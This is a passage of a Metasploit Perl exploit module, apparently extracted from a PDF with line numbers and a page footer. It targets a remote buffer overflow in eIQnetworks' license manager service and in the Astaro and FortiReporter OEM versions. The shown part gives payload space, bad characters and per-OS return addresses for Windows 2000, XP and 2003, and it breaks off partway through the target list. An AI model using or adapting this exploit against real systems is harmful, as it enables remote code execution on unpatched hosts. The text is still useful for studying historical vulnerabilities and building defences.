1 #!/usr/bin/perl −w
2
3 package Msf::Exploit::EiQ_License;
4 use base "Msf::Exploit";
5 use strict;
6 use Pex::Text;
7
8 my $advanced = { };
9
10 my $info =
11 {
12
’Name’ => ’EIQ License Manager Overflow’,
13
’Authors’ => [ ’ri0t ri0t@ri0tnet.net KF kf_list@digitalmunition.com’ ],
14
15
’Arch’ => [ ’x86’ ],
16
’OS’ => [ ’win32’, ’win2000’, ’winxp’ ],
17
’Priv’ => 0,
18
19
’AutoOpts’ => { ’EXITFUNC’ => ’seh’ },
20
21
’UserOpts’ =>
22
{
23
’RHOST’ => [1, ’ADDR’, ’The target address’],
24
’RPORT’ => [1, ’PORT’, ’The target port’, 10616],
25
},
26 ’Payload’ =>
27
{
28
’Space’ => 494,
29
’BadChars’ => "\x00\x0a\x0d\x40\x26",
30 },
31 ’Description’ => Pex::Text::Freeform(qq{
32 This module Exploits a buffer overflow in the LICENCE_MANAGER field of
33
EiQ networks Enterprise Security Analyzer. This bug was found by Titon
34
of Bastard Labs.
35 }),
36
37
38
’Refs’ =>
39
[
40
[’OSVDB’, ’27526’],
41
],
42
43 ’DefaultTarget’ => 1,
44
’Targets’ =>
45
[
46
[’EiQ Enterprise Security Analyzer Buffer size 494 Windows 2000 SP0−SP4 English’, 0x750316e2, 494 ], # call ebx
47
[’EiQ Enterprise Security Analyzer Buffer size 494 Windows XP English SP1/SP2’, 0x77db64dc, 494 ],
# jmp ebx
48
[’EiQ Enterprise Security Analyzer Buffer size 494 Windwos Server 2003 SP0/SP1’, 0x77d16764, 494 ], # jmp EBX
49
[’Astaro Report Manager (OEM) Buffer size 1262 Windows 2000 SP0−SP4 English’, 0x750316e2, 1262 ],
50
[’Astaro Report Manager (OEM) Buffer size 1262 Windows XP English SP1/SP2’, 0x77db64dc, 1262 ],
51
[’Astaro Report Manager (OEM) Buffer size 1262 Windows Server 2003 English SP0/SP1’, 0x77d16764, 1262 ],
Page 1/3
eIQnetworks License Manager Remote Buffer Overflow Exploit multi
ri0t
08/07/2006
52
[’Fortinet FortiReporter (OEM) Buffer size 1262 Windows 2000 SP0−SP4 English’, 0x750316e2, 1262 ],
53
[’Fortinet FortiReporter (OEM) Buffer size 1262 Windows XP English SP1/SP2’, 0x77db64dc, 1262 ],
54
[’Fortinet FortiReporter (